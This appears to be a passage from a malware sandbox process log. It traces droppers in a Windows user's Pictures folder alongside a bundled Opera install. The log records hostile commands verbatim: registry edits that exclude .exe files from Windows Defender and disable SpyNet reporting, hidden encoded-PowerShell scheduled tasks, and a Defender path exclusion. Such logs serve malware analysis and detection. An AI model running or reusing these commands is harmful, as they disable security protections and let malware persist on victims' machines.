        "C:\Users\Admin\AppData\Local\Programs\Opera\106.0.4998.66\installer.exe" --backend --initial-pid=6616 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --show-intro-overlay --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401300048471" --session-guid=50ec2ac4-6c52-4e52-96db-a071b67e20f2 --server-tracking-blob=Zjc5NjcxYjA5NGI0ZGExMjVlNDg5NTE2M2JjNTY3OWVhODk4ZThiOTMxNDQwN2YxZDI4MzM1N2VlNGM5NTUyMDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNjU3NTcxMS42OTg5IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJiNTUxNTk2YS1lM2QwLTQyZmItOTc1YS1jYTYzNDk5NWNmMzIifQ== --silent --desktopshortcut=1 --install-subfolder=106.0.4998.66
        6⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\Programs\Opera\106.0.4998.66\installer.exe
        
        C:\Users\Admin\AppData\Local\Programs\Opera\106.0.4998.66\installer.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2a8,0x2ac,0x2b0,0x284,0x2b4,0x7fff2d8c34b0,0x7fff2d8c34bc,0x7fff2d8c34c8
        7⤵
        
        PID:6428
        
        C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --ran-launcher --headless=new --install-extension="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401300048471\be76331b95dfc399cd776d2fc68021e0db03cc4f.crx"
        7⤵
        
        PID:8924
        
        C:\Users\Admin\AppData\Local\Programs\Opera\106.0.4998.66\opera_crashreporter.exe
        
        C:\Users\Admin\AppData\Local\Programs\Opera\106.0.4998.66\opera_crashreporter.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2d0,0x2d4,0x2d8,0x2cc,0x2dc,0x7fff1f31ad40,0x7fff1f31ad50,0x7fff1f31ad60
        8⤵
        
        PID:8460
        
        C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --noerrdialogs --user-data-dir="C:\Program Files\scoped_dir8924_418486967" --start-stack-profiler --mojo-platform-channel-handle=1980 --field-trial-handle=1948,i,13648754023104278853,919694851284181402,262144 --disable-features=PaintHolding --variations-seed-version /prefetch:8
        8⤵
        
        PID:9080
        
        C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Program Files\scoped_dir8924_418486967" --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1944 --field-trial-handle=1948,i,13648754023104278853,919694851284181402,262144 --disable-features=PaintHolding --variations-seed-version /prefetch:2
        8⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --noerrdialogs --user-data-dir="C:\Program Files\scoped_dir8924_418486967" --mojo-platform-channel-handle=2356 --field-trial-handle=1948,i,13648754023104278853,919694851284181402,262144 --disable-features=PaintHolding --variations-seed-version /prefetch:8
        8⤵
        
        PID:1928
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401300048471\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401300048471\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
        5⤵
        
        PID:1044
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401300048471\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401300048471\assistant\assistant_installer.exe" --version
        5⤵
        
        PID:3536
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401300048471\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401300048471\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x1f2614,0x1f2620,0x1f262c
        6⤵
        
        PID:4236
  - - C:\Users\Admin\Pictures\T6celpszjUgGc7GYIBi7jIvO.exe
      "C:\Users\Admin\Pictures\T6celpszjUgGc7GYIBi7jIvO.exe" /VERYSILENT
      4⤵
      PID:4648
    - - C:\Users\Admin\AppData\Local\Temp\is-S5A9F.tmp\T6celpszjUgGc7GYIBi7jIvO.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-S5A9F.tmp\T6celpszjUgGc7GYIBi7jIvO.tmp" /SL5="$202FA,831488,831488,C:\Users\Admin\Pictures\T6celpszjUgGc7GYIBi7jIvO.exe" /VERYSILENT
        5⤵
        
        PID:7052
  - - C:\Users\Admin\Pictures\TzWSL5qRHRibUnhhqkvHi8Dl.exe
      "C:\Users\Admin\Pictures\TzWSL5qRHRibUnhhqkvHi8Dl.exe"
      4⤵
      PID:884
    - - C:\Users\Admin\AppData\Local\Temp\7zS28A3.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:408
      - C:\Users\Admin\AppData\Local\Temp\7zS5BE8.tmp\Install.exe
        
        .\Install.exe /JzZdidJbWMX "385118" /S
        6⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:6436
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:7164
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:6972
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:6756
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:5548
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:5004
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:6084
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gXTRChLaC" /SC once /ST 00:18:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gXTRChLaC"
        7⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gXTRChLaC"
        7⤵
        
        PID:6240
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bOrmmySruVuSWczIqx" /SC once /ST 00:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\feivvLQREPpkgTfwK\yGRxWeIFceDDoQa\dwMNXcJ.exe\" Qh /bdsite_idFrX 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:1352
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bOrmmySruVuSWczIqx"
        7⤵
        
        PID:7240
  - - C:\Users\Admin\Pictures\wfj9KmqzVTw8kBw4AENWnkMg.exe
      "C:\Users\Admin\Pictures\wfj9KmqzVTw8kBw4AENWnkMg.exe"
      4⤵
      PID:5348
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 376
        5⤵
        
        PID:2456
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 392
        5⤵
        
        PID:5508
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 256
        5⤵
        
        PID:3780
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 716
        5⤵
        
        PID:4196
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 740
        5⤵
        
        PID:2768
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 760
        5⤵
        
        PID:8028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:7372
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 808
        5⤵
        
        PID:7488
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 692
        5⤵
        
        PID:3292
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 836
        5⤵
        
        PID:1040
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 832
        5⤵
        
        PID:4908
  - - C:\Users\Admin\Pictures\kJywtb4CwffOgkdjs8zniDHg.exe
      "C:\Users\Admin\Pictures\kJywtb4CwffOgkdjs8zniDHg.exe" /VERYSILENT
      4⤵
      PID:3864
    - - C:\Users\Admin\AppData\Local\Temp\is-6RSUI.tmp\kJywtb4CwffOgkdjs8zniDHg.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6RSUI.tmp\kJywtb4CwffOgkdjs8zniDHg.tmp" /SL5="$802F0,831488,831488,C:\Users\Admin\Pictures\kJywtb4CwffOgkdjs8zniDHg.exe" /VERYSILENT
        5⤵
        
        PID:2880
  - - C:\Users\Admin\Pictures\wtdkBk7QhrApbMN91bQkRCGW.exe
      "C:\Users\Admin\Pictures\wtdkBk7QhrApbMN91bQkRCGW.exe"
      4⤵
      PID:3208
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 372
        5⤵
        
        PID:2752
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 388
        5⤵
        
        PID:1988
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 392
        5⤵
        
        PID:4520
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 680
        5⤵
        
        PID:2316
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 728
        5⤵
        
        PID:6852
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 756
        5⤵
        
        PID:7816
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 744
        5⤵
        
        PID:8044
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3896
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 720
        5⤵
        
        PID:532
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 748
        5⤵
        
        PID:6800
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 824
        5⤵
        
        PID:8116
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 732
        5⤵
        
        PID:5596
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 844
        5⤵
        
        PID:9164
  - - C:\Users\Admin\Pictures\VjIybGLsw0ZZ98UehZs48p33.exe
      "C:\Users\Admin\Pictures\VjIybGLsw0ZZ98UehZs48p33.exe"
      4⤵
      PID:1972
    - - C:\Users\Admin\AppData\Local\Temp\7zS2213.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:1428
      - C:\Users\Admin\AppData\Local\Temp\7zS4BC3.tmp\Install.exe
        
        .\Install.exe /JzZdidJbWMX "385118" /S
        6⤵
        
        PID:4160
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:3612
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:7416
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:7404
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:3568
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:7956
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:7932
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gYyysMGnP" /SC once /ST 00:00:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:6720
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gYyysMGnP"
        7⤵
        
        PID:4144
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gYyysMGnP"
        7⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bOrmmySruVuSWczIqx" /SC once /ST 00:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\feivvLQREPpkgTfwK\yGRxWeIFceDDoQa\yCBsyBg.exe\" Qh /Kfsite_idZTS 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:7972
  - - C:\Users\Admin\Pictures\CkSHEMcPrybzFcQy5CvNiPIY.exe
      "C:\Users\Admin\Pictures\CkSHEMcPrybzFcQy5CvNiPIY.exe" --silent --allusers=0
      4⤵
      PID:6212
    - - C:\Users\Admin\Pictures\CkSHEMcPrybzFcQy5CvNiPIY.exe
        
        C:\Users\Admin\Pictures\CkSHEMcPrybzFcQy5CvNiPIY.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2cc,0x2fc,0x69a39558,0x69a39564,0x69a39570
        5⤵
        
        PID:5884
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkSHEMcPrybzFcQy5CvNiPIY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkSHEMcPrybzFcQy5CvNiPIY.exe" --version
        5⤵
        
        PID:7040
  - - C:\Users\Admin\Pictures\RheIUb0OkE0YSOBa1uua1A2N.exe
      "C:\Users\Admin\Pictures\RheIUb0OkE0YSOBa1uua1A2N.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
      4⤵
      PID:1568
  - - C:\Users\Admin\Pictures\5HZJ4UaXkIqZVw058AQkDNwl.exe
      "C:\Users\Admin\Pictures\5HZJ4UaXkIqZVw058AQkDNwl.exe"
      4⤵
      PID:6156
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6156 -s 372
        5⤵
        
        PID:5908
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6156 -s 388
        5⤵
        
        PID:4184
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6156 -s 396
        5⤵
        
        PID:4548
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6156 -s 740
        5⤵
        
        PID:8996
  - - C:\Users\Admin\Pictures\OczmFAZpUETpOMTDcPebsvrf.exe
      "C:\Users\Admin\Pictures\OczmFAZpUETpOMTDcPebsvrf.exe"
      4⤵
      PID:4696
    - - C:\Users\Admin\AppData\Local\Temp\7zSF657.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:7424
      - C:\Users\Admin\AppData\Local\Temp\7zS4CD4.tmp\Install.exe
        
        .\Install.exe /JzZdidJbWMX "385118" /S
        6⤵
        
        PID:2348
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:8716
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:8392
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:7584
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:7300
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gmOtOGOlj" /SC once /ST 00:20:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:6784
  - - C:\Users\Admin\Pictures\YmgL0BOMHmfrtjtEk2x3useV.exe
      "C:\Users\Admin\Pictures\YmgL0BOMHmfrtjtEk2x3useV.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
      4⤵
      PID:5952
  - - C:\Users\Admin\Pictures\9Yurr0ae6MMiFbOJYD2RPNrB.exe
      "C:\Users\Admin\Pictures\9Yurr0ae6MMiFbOJYD2RPNrB.exe"
      4⤵
      PID:6328
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 372
        5⤵
        
        PID:5636
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 768
        5⤵
        
        PID:7192
  - - C:\Users\Admin\Pictures\xsxxTpPhVVYzp7WzSTRCfBsr.exe
      "C:\Users\Admin\Pictures\xsxxTpPhVVYzp7WzSTRCfBsr.exe" --silent --allusers=0
      4⤵
      PID:2920
    - - C:\Users\Admin\Pictures\xsxxTpPhVVYzp7WzSTRCfBsr.exe
        
        C:\Users\Admin\Pictures\xsxxTpPhVVYzp7WzSTRCfBsr.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2cc,0x2fc,0x68f49558,0x68f49564,0x68f49570
        5⤵
        
        PID:3784
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xsxxTpPhVVYzp7WzSTRCfBsr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xsxxTpPhVVYzp7WzSTRCfBsr.exe" --version
        5⤵
        
        PID:4644
  - - C:\Users\Admin\Pictures\mJCJEpiG832DlwURWLyjX9D2.exe
      "C:\Users\Admin\Pictures\mJCJEpiG832DlwURWLyjX9D2.exe" /VERYSILENT
      4⤵
      PID:2160
    - - C:\Users\Admin\AppData\Local\Temp\is-PUHQB.tmp\mJCJEpiG832DlwURWLyjX9D2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PUHQB.tmp\mJCJEpiG832DlwURWLyjX9D2.tmp" /SL5="$3042C,831488,831488,C:\Users\Admin\Pictures\mJCJEpiG832DlwURWLyjX9D2.exe" /VERYSILENT
        5⤵
        
        PID:5640
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\Setup11.exe" -Force
    3⤵
    PID:2480
- C:\Users\Admin\AppData\Local\Temp\Files\Zjqkz.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Zjqkz.exe"
  2⤵
  PID:2364
- C:\Users\Admin\AppData\Local\Temp\Files\build.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
  2⤵
  PID:5916
- - C:\Users\Admin\AppData\Local\Temp\adasda.exe
